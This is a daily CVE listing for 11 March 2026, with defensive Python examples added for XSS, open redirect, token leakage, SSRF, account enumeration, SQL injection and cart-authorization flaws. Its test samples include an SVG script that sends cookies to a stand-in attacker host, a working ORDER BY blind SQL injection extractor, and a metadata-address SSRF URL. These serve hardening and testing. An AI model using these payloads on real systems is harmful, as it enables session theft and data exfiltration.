
CVE Vulnerabilities - 11 March 2026


396 vulnerabilities published on 11 March 2026

Adobe Experience Manager versions 6.5.23 and earlier allow malicious scripts to run in user browsers
CVE-2026-27230
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-p...
5.4
Adobe Experience Manager versions 6.5.23 and earlier allow malicious scripts to run in users' browsers
CVE-2026-27229
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an atta...
5.4
Adobe Experience Manager forms can inject malicious code in browsers
CVE-2026-27228
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-p...
5.4
Adobe Experience Manager: Malicious scripts injected into user browsers
CVE-2026-27226
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an atta...
5.4
Adobe Experience Manager: Malicious scripts injected in form fields
CVE-2026-27225
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-p...
5.4
Adobe Experience Manager versions 6.5.23 and earlier: Malicious scripts injected in form fields
CVE-2026-27224
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an atta...
5.4
Adobe Experience Manager versions 6.5.23 and earlier allow malicious scripts to run in user browsers
CVE-2026-27223
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an atta...
5.4
actix-web-lab can redirect to attacker-specified URLs
GHSA-vhj5-x93p-67jw
Summary: `actix-web-lab` redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, `https://{host...
5.4
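The actix-web-lab entry describes the classic Host-header open redirect: an absolute Location URL built from whatever hostname the client sent. The following is an added example (not actix-web-lab's code, and written in Python rather than Rust so it runs without the framework) that shows the flawed pattern next to a hardened builder and a check that a Location header stays on-site. `ALLOWED_HOSTS` and `CANONICAL_HOST` are assumed deployment configuration.

```python
from urllib.parse import urlsplit

# Assumed deployment configuration (not from actix-web-lab): the hostnames
# this service is actually reachable under, and the one to fall back to.
ALLOWED_HOSTS = {"app.example.com", "www.example.com"}
CANONICAL_HOST = "app.example.com"


def redirect_location_vulnerable(request_host: str, target_path: str) -> str:
    """The flawed pattern: the Host (or X-Forwarded-Host) value the client sent
    becomes the authority of the absolute URL in the Location header."""
    return f"https://{request_host}{target_path}"


def safe_path(target_path: str) -> str:
    """Keep only absolute paths; '//host' and '/\\host' are scheme-relative
    URLs to a browser, so they would also redirect off-site."""
    if not target_path.startswith("/") or target_path[1:2] in ("/", "\\"):
        return "/"
    return target_path


def redirect_location_hardened(request_host: str, target_path: str) -> str:
    """Only a Host value from the allowlist is echoed back; anything else is
    replaced with the configured canonical host."""
    host = request_host.strip().lower()
    if host not in ALLOWED_HOSTS:
        host = CANONICAL_HOST
    return f"https://{host}{safe_path(target_path)}"


def redirect_leaves_site(location: str) -> bool:
    """True when a Location header would take the browser to a host outside
    ALLOWED_HOSTS; usable as a check in a test suite or over proxy logs."""
    netloc = urlsplit(location).netloc.lower()
    return bool(netloc) and netloc not in ALLOWED_HOSTS


if __name__ == "__main__":
    # Constructed request: attacker-controlled Host header, legitimate path.
    evil_host, path = "evil.example", "/login"
    for name, fn in (("vulnerable", redirect_location_vulnerable),
                     ("hardened", redirect_location_hardened)):
        loc = fn(evil_host, path)
        print(f"{name:10} Location: {loc}  off-site={redirect_leaves_site(loc)}")
```

The same check applies behind a reverse proxy: `X-Forwarded-Host` is client-controlled unless the proxy overwrites it, so the allowlist comparison has to happen on whichever header the application actually reads.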
Umbraco Backoffice API Allows Unauthorized Domain Changes
CVE-2026-31832 GHSA-fpvf-fvp5-996r
Description: A broken object-level authorization vulnerability exists in a backoffice API endpoint that allows authenticated users to assign domain...
5.4
Parse Server allows attackers to steal session tokens via SVG file upload
CVE-2026-30948 GHSA-hcj7-6gxh-24ww
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.5.2-alpha.4 and 8.6.17, a stored cr...
7.8
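The Parse Server entry is a stored XSS delivered through an SVG upload: an SVG is an XML document and, when served inline, can carry `<script>` and event-handler attributes that run in the origin of the site that hosts it. The block below is an added example, not Parse Server's upload or sanitization code. It parses a constructed upload, rejects script-bearing content, and builds the response headers that keep an upload from executing even if something slips through. The blocked-element list and the header policy are this example's assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Elements that execute script or embed foreign content. Rejecting them is
# this example's policy, not Parse Server's sanitizer.
BLOCKED_ELEMENTS = {"script", "foreignobject", "iframe", "object", "embed"}


def _local(qname: str) -> str:
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}svg' -> 'svg'."""
    return qname.rsplit("}", 1)[-1]


def svg_is_safe(data: bytes) -> tuple:
    """Parse the upload as XML and reject anything that can run script when
    the file is rendered inline. Caveat: ElementTree does not defend against
    entity-expansion attacks; use defusedxml for untrusted input in production."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    if _local(root.tag).lower() != "svg":
        return False, "root element is not <svg>"
    for el in root.iter():
        name = _local(el.tag).lower()
        if name in BLOCKED_ELEMENTS:
            return False, f"<{name}> element"
        for attr, value in el.attrib.items():
            a = _local(attr).lower()
            # Browsers ignore whitespace inside a URL scheme, so
            # 'java\tscript:' must be normalised before comparison.
            v = re.sub(r"\s+", "", value).lower()
            if a.startswith("on"):
                return False, f"event handler attribute {a}"
            if a == "href" and (v.startswith("javascript:") or v.startswith("data:")):
                return False, f"active href {value!r}"
    return True, "ok"


def safe_serving_headers(filename: str) -> dict:
    """Headers for serving a user upload: as a download, never sniffed, and
    with a sandboxed no-script CSP in case it is opened inline anyway."""
    filename = re.sub(r"[^\w.-]", "_", filename)   # no quotes or separators in the header
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


# Constructed sample uploads: one benign, three that would run script inline.
BENIGN = b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10"><circle cx="5" cy="5" r="4"/></svg>'
SCRIPT = b'<svg xmlns="http://www.w3.org/2000/svg"><script>fetch("https://attacker.example/?c=" + document.cookie)</script></svg>'
ONLOAD = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>'
HREF = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
        b'<a xlink:href="java&#9;script:alert(1)"><text y="10">x</text></a></svg>')

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("script", SCRIPT), ("onload", ONLOAD), ("href", HREF)):
        print(f"{label:7}", svg_is_safe(blob))
    print(safe_serving_headers("logo.svg"))
```

Serving uploads from a separate, cookieless origin is the stronger fix; the headers above limit the damage when the application's own origin must serve them.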
OpenAkita Chat API Endpoint Allows Malicious Command Execution
CVE-2026-3964
A weakness has been identified in OpenAkita up to 1.24.3. This impacts the function run of the file src/openakita/tools/shell.py of the component Chat...
4.8
Tshark CLI Command Handler May Allow Attackers to Execute Malicious Commands
CVE-2026-3959
A vulnerability was found in 0xKoda WireMCP up to 7f45f8b2b4adeb76be8c6227eefb38533fdd6b1e. Impacted is the function server.tool of the file index.js ...
4.8
Lenovo Filez: Data Stolen via Malicious Certificates on Network
CVE-2026-1068
An improper certificate validation vulnerability was reported in the Lenovo Filez application that could allow a user capable of intercepting network ...
6.0
Home Assistant OAuth Service Allows Unauthorized Network Scans
CVE-2026-32111 GHSA-fmfg-9g7c-3vq7
ha-mcp is a Home Assistant MCP Server. Prior to 7.0.0, the ha-mcp OAuth consent form (beta feature) accepts a user-supplied ha_url and makes a server-...
5.3
Parse Server allows attackers to find existing email addresses
GHSA-w54v-hf9p-8856 CVE-2026-31901
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 8.6.34 and 9.6.0-alpha.8, the email v...
6.3
Shopware Exposes Customer Account Existence Through Store API Login
CVE-2026-31888 GHSA-gqc5-xv7m-gcjq
Summary: The Store API login endpoint (`POST /store-api/account/login`) returns different error codes depending on whether the submitted email addr...
5.3
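The Parse Server entry above ("find existing email addresses") and the Shopware login entry are both account-enumeration oracles: the server answers differently depending on whether an address is registered. The following is an added example, not code from either project, showing a login handler with distinct error codes beside one that returns a single failure response and does the same amount of work on both paths, plus the black-box probe a tester would use to tell them apart. The credential store, the PBKDF2 parameters and the addresses are constructed; the probe assumes the tester knows one registered address (their own account).

```python
import hashlib
import hmac

# Constructed credential store. The KDF parameters are an assumption of this
# example; what matters is that both code paths cost the same.
_SALT = b"constructed-static-salt"


def _hash_password(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 20_000)


USERS = {"alice@example.com": _hash_password("correct horse battery staple")}
# Hashed once at startup so the "no such account" path performs a real
# comparison instead of returning early (no timing side channel either).
_DUMMY_HASH = _hash_password("dummy")


def login_vulnerable(email: str, password: str) -> tuple:
    """Distinct responses for 'unknown account' and 'wrong password' turn
    the login endpoint into an account-existence oracle."""
    stored = USERS.get(email)
    if stored is None:
        return 404, "CUSTOMER_NOT_FOUND"
    if hmac.compare_digest(stored, _hash_password(password)):
        return 200, "OK"
    return 401, "BAD_CREDENTIALS"


def login_hardened(email: str, password: str) -> tuple:
    """One response for every failure, and the same work on every path."""
    stored = USERS.get(email, _DUMMY_HASH)
    match = hmac.compare_digest(stored, _hash_password(password))
    if match and email in USERS:
        return 200, "OK"
    return 401, "BAD_CREDENTIALS"


def leaks_existence(login) -> bool:
    """Black-box probe: one known-registered and one unregistered address,
    both with a wrong password. Differing responses mean the endpoint leaks."""
    registered = login("alice@example.com", "wrong-password")
    unregistered = login("nobody@example.com", "wrong-password")
    return registered != unregistered


if __name__ == "__main__":
    print("vulnerable leaks existence:", leaks_existence(login_vulnerable))
    print("hardened leaks existence:  ", leaks_existence(login_hardened))
```

The probe compares whole responses; in practice a tester also compares response times and body length, which is why the hardened handler hashes on the unknown-account path too.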
Curl Exposes OAuth Tokens with Redirection and .netrc
CVE-2026-3783 CURL-CVE-2026-3783
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a redirect to a second URL, curl could leak that token to the ...
5.3
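The curl entry concerns an OAuth2 bearer token that survives a redirect to a second URL. The block below is an added example (not curl's code) of a redirect-following client over a constructed, socket-free "network": one variant re-sends `Authorization` to every hop, the other drops it as soon as the redirect target's host differs from the host the request started on, which is the behaviour a practitioner wants regardless of which client library is in use. URLs, hosts and the token are constructed.

```python
from urllib.parse import urljoin, urlsplit

# Constructed "network": URL -> (status, response headers). No sockets are used.
ROUTES = {
    "https://api.example.com/v1/me": (302, {"Location": "https://cdn.evil.example/me"}),
    "https://cdn.evil.example/me": (200, {}),
    "https://api.example.com/v1/old": (302, {"Location": "/v1/new"}),
    "https://api.example.com/v1/new": (200, {}),
}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def fetch(url: str, headers: dict, strip_auth_on_host_change: bool,
          log: list, max_redirects: int = 5) -> int:
    """Follow redirects, appending (url, headers actually sent) to log.
    With strip_auth_on_host_change=False the Authorization header travels
    to every hop, which is the leak the curl advisory describes."""
    for _ in range(max_redirects + 1):
        log.append((url, dict(headers)))
        status, resp_headers = ROUTES[url]
        if status not in REDIRECT_STATUSES:
            return status
        next_url = urljoin(url, resp_headers["Location"])
        if strip_auth_on_host_change and \
                urlsplit(next_url).netloc.lower() != urlsplit(url).netloc.lower():
            headers = {k: v for k, v in headers.items() if k.lower() != "authorization"}
        url = next_url
    raise RuntimeError("too many redirects")


def hosts_that_received_token(start_url: str, strip: bool) -> list:
    """Which hosts saw the bearer token during the redirect chain."""
    log = []
    fetch(start_url, {"Authorization": "Bearer constructed-token"}, strip, log)
    return sorted({urlsplit(u).netloc for u, h in log if "Authorization" in h})


if __name__ == "__main__":
    for strip in (False, True):
        print(f"strip_on_host_change={strip}:",
              hosts_that_received_token("https://api.example.com/v1/me", strip))
```

A same-host redirect (`/v1/old` to `/v1/new`) keeps the token in both variants; only the cross-host hop is affected, which is the case where the token reaches a party it was never issued to.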
Adobe Commerce: Unvalidated User Input Can Bypass Security Features
CVE-2026-21310
Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier are affected by an Improper Input Validation vul...
5.3
Adobe Commerce versions 2.4.9-alpha3 and earlier: Unauthorized access to data possible
CVE-2026-21286
Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier are affected by an Incorrect Authorization vulne...
5.3
Adobe Commerce versions 2.4.9-alpha3 and earlier may crash due to bad input
CVE-2026-21282
Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier are affected by an Improper Input Validation vul...
5.3
Quill Crashes When Notarizing with Large Apple Response
GHSA-g32c-4pvp-769g CVE-2026-31960
Impact: Quill before version `v0.7.1` has unbounded reads of HTTP response bodies during the Apple notarization process. Exploitation requires the...
5.3
Quill Fails to Validate Apple Notarization Log URL
GHSA-7q3q-5px6-4c5p CVE-2026-31959
Impact: Quill before version `v0.7.1` contains a Server-Side Request Forgery (SSRF) vulnerability when attempting to fetch the Apple notarization ...
5.3
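Three entries above share one root cause: a client fetching a URL it did not fully control (ha-mcp accepting a user-supplied `ha_url`, Quill fetching an unvalidated notarization log URL) and, in Quill's second entry, reading whatever body came back without a size limit. The block below is an added example, not code from ha-mcp or Quill, that validates an outbound URL against an allowlist before any request is made and reads a response body under a hard cap. The allowlist host, the limits and the sample URLs are constructed; the validator deliberately does not resolve DNS, and the caveat about that is in the docstring.

```python
import io
import ipaddress
from urllib.parse import urlsplit


class UnsafeURL(ValueError):
    pass


class BodyTooLarge(ValueError):
    pass


def validate_outbound_url(url: str, allowed_hosts: set) -> str:
    """Accept only https URLs to an explicitly allowed host on the default
    port, with no userinfo and no non-public IP literal. Caveat: the hostname
    is not resolved here; a real client must resolve it, apply the same
    address check to the result, and connect to that address, otherwise DNS
    rebinding bypasses the allowlist."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise UnsafeURL(f"scheme {parts.scheme!r} not allowed")
    if parts.username or parts.password:
        raise UnsafeURL("userinfo in URL")
    host = (parts.hostname or "").lower()
    try:
        literal = ipaddress.ip_address(host)
    except ValueError:
        literal = None
    if literal is not None and not literal.is_global:
        raise UnsafeURL(f"non-public address {host}")
    if host not in allowed_hosts:
        raise UnsafeURL(f"host {host!r} not in allowlist")
    if parts.port not in (None, 443):
        raise UnsafeURL(f"port {parts.port} not allowed")
    return url


def read_capped(body, limit: int) -> bytes:
    """Read a response body in chunks and fail once it exceeds limit bytes,
    instead of buffering whatever the server chooses to send."""
    buf = bytearray()
    while True:
        chunk = body.read(min(64 * 1024, limit - len(buf) + 1))
        if not chunk:
            return bytes(buf)
        buf += chunk
        if len(buf) > limit:
            raise BodyTooLarge(f"response exceeds {limit} bytes")


def read_bytes_capped(data: bytes, limit: int) -> bytes:
    """Convenience wrapper over an in-memory body (constructed input)."""
    return read_capped(io.BytesIO(data), limit)


def url_is_rejected(url: str, allowed_hosts: set) -> bool:
    try:
        validate_outbound_url(url, allowed_hosts)
    except UnsafeURL:
        return True
    return False


def body_is_rejected(data: bytes, limit: int) -> bool:
    try:
        read_bytes_capped(data, limit)
    except BodyTooLarge:
        return True
    return False


if __name__ == "__main__":
    allowed = {"notary.example.com"}   # assumed: the only host this client may fetch from
    for u in ("https://notary.example.com/log/abc",
              "http://notary.example.com/log/abc",
              "https://169.254.169.254/latest/meta-data/",
              "https://notary.example.com@evil.example/log"):
        print(f"{u:48} rejected={url_is_rejected(u, allowed)}")
    print("1 MiB body under a 64 KiB cap rejected:",
          body_is_rejected(b"x" * 2**20, 64 * 1024))
```

The fourth sample URL is the userinfo trick: `urlsplit` reports `evil.example` as the host, so an allowlist check that looked only at the substring before the `@` would pass it.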
Sylius API allows attackers to inject malicious code into database queries
CVE-2026-31825 GHSA-xcwx-r2gw-w93m
Impact: Sylius API filters `ProductPriceOrderFilter` and `TranslationOrderNameAndLocaleFilter` pass user-supplied order direction values directly t...
5.3
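The Sylius order-filter entry is SQL injection through an `ORDER BY` direction, a spot that cannot be fixed with bind parameters because the direction is a keyword, not a value. The block below is an added example (not Sylius code, and SQLite rather than Sylius's Doctrine layer) that shows why it matters: with the direction concatenated into the statement, the secondary sort key becomes attacker SQL, and a CASE expression there turns row order into a boolean oracle that leaks a value from another table one character at a time. The hardened version maps the input onto an allowlist. Schema, rows and the secret are constructed.

```python
import sqlite3
import string

ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def make_db() -> sqlite3.Connection:
    """Constructed schema: three products with equal prices (ties are what
    let a secondary sort key decide the order) and a secret in another table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        INSERT INTO product VALUES (1, 'a', 10), (2, 'b', 10), (3, 'c', 10);
        CREATE TABLE admin (secret TEXT);
        INSERT INTO admin VALUES ('hunter2');
    """)
    return conn


def ids_sorted_vulnerable(conn, direction: str) -> list:
    """The flawed pattern: the client-supplied direction is concatenated into
    the statement, so everything after 'ORDER BY price' is attacker SQL."""
    rows = conn.execute(f"SELECT id FROM product ORDER BY price {direction}")
    return [r[0] for r in rows]


def ids_sorted_hardened(conn, direction: str) -> list:
    """Keywords cannot be bound as parameters, so map the input onto an
    allowlist and interpolate only the allowlisted token."""
    token = direction.strip().upper()
    if token not in ALLOWED_DIRECTIONS:
        raise ValueError("order direction must be ASC or DESC")
    rows = conn.execute(f"SELECT id FROM product ORDER BY price {token}")
    return [r[0] for r in rows]


def leak_secret(conn, alphabet: str = string.ascii_lowercase + string.digits,
                max_len: int = 32) -> str:
    """Boolean inference through the vulnerable sort: the CASE expression in
    the secondary sort key yields id when the guess is right and -id when it
    is wrong, so the tie-break order (3,2,1 vs 1,2,3) answers each guess."""
    secret = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = (f"ASC, (CASE WHEN (SELECT substr(secret, {pos}, 1) FROM admin) = '{ch}' "
                     f"THEN id ELSE -id END) DESC")
            if ids_sorted_vulnerable(conn, probe) == [3, 2, 1]:
                secret += ch
                break
        else:
            return secret        # no character matched: end of the secret
    return secret


def injection_is_rejected(conn, direction: str) -> bool:
    try:
        ids_sorted_hardened(conn, direction)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked through ORDER BY:", leak_secret(db))
    print("hardened rejects probe: ", injection_is_rejected(db, "ASC, (SELECT 1) DESC"))
```

The same allowlist approach applies to sortable column names: accept a fixed set of identifiers from the client, look up the real column in a server-side map, and never interpolate the client string itself.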
Sylius API Allows Unauthorized Cart Item Addition
CVE-2026-31821 GHSA-wjmg-4cq5-m8hg
Impact: The `POST /api/v2/shop/orders/{tokenValue}/items` endpoint does not verify cart ownership. An unauthenticated attacker can add items to oth...
8.1
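The Sylius cart entry and the Umbraco domain-assignment entry above are both broken object-level authorization: the handler locates the object from an identifier in the request and mutates it without asking whether the caller is allowed to. The block below is an added example, not code from Sylius or Umbraco, that models the cart case (a token-addressed cart that may belong to a customer or to a guest session) with the missing check beside the hardened handler. The data model, tokens and requester fields are constructed assumptions.

```python
from dataclasses import dataclass, field
from typing import Optional


class AccessDenied(Exception):
    """One error for 'no such cart' and 'not your cart', so the endpoint
    cannot be used to confirm which tokens exist."""


@dataclass
class Requester:
    customer_id: Optional[str]          # None for an unauthenticated caller
    session_cart_token: Optional[str]   # guest cart bound to this session, if any


@dataclass
class Cart:
    token: str
    owner_id: Optional[str]             # None for a guest cart
    items: list = field(default_factory=list)


def make_carts() -> dict:
    """Constructed store: one customer-owned cart and one guest cart."""
    return {
        "tok-alice": Cart("tok-alice", "alice"),
        "tok-guest": Cart("tok-guest", None),
    }


def add_item_vulnerable(carts: dict, token: str, sku: str, who: Requester) -> Cart:
    """The flawed pattern: the token is used only to look the cart up, never
    to decide whether the caller may change it."""
    cart = carts[token]
    cart.items.append(sku)
    return cart


def add_item_hardened(carts: dict, token: str, sku: str, who: Requester) -> Cart:
    """Object-level authorization: a customer cart may only be changed by that
    customer; a guest cart only by the session it was created in."""
    cart = carts.get(token)
    if cart is None:
        raise AccessDenied()
    if cart.owner_id is not None:
        authorized = who.customer_id == cart.owner_id
    else:
        authorized = who.session_cart_token == cart.token
    if not authorized:
        raise AccessDenied()
    cart.items.append(sku)
    return cart


def attempt(handler, token: str, who: Requester) -> Optional[int]:
    """Run one request against a fresh store; return the resulting item
    count, or None if the request was refused."""
    carts = make_carts()
    try:
        return len(handler(carts, token, "SKU-1", who).items)
    except AccessDenied:
        return None


if __name__ == "__main__":
    anonymous = Requester(customer_id=None, session_cart_token=None)
    alice = Requester(customer_id="alice", session_cart_token=None)
    print("anonymous -> alice's cart, vulnerable:", attempt(add_item_vulnerable, "tok-alice", anonymous))
    print("anonymous -> alice's cart, hardened:  ", attempt(add_item_hardened, "tok-alice", anonymous))
    print("alice -> own cart, hardened:          ", attempt(add_item_hardened, "tok-alice", alice))
```

The guest-cart branch only holds if tokens are unguessable (random, not sequential); the ownership check limits what a leaked token can do, it does not make a predictable token safe.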
Django-Unicorn: Unauthorized access to internal templates and attributes
CVE-2026-31815 GHSA-ffv6-jj46-x367
Summary: Component state manipulation is possible in `django-unicorn` due to missing access control checks during property updates and method calls....
5.3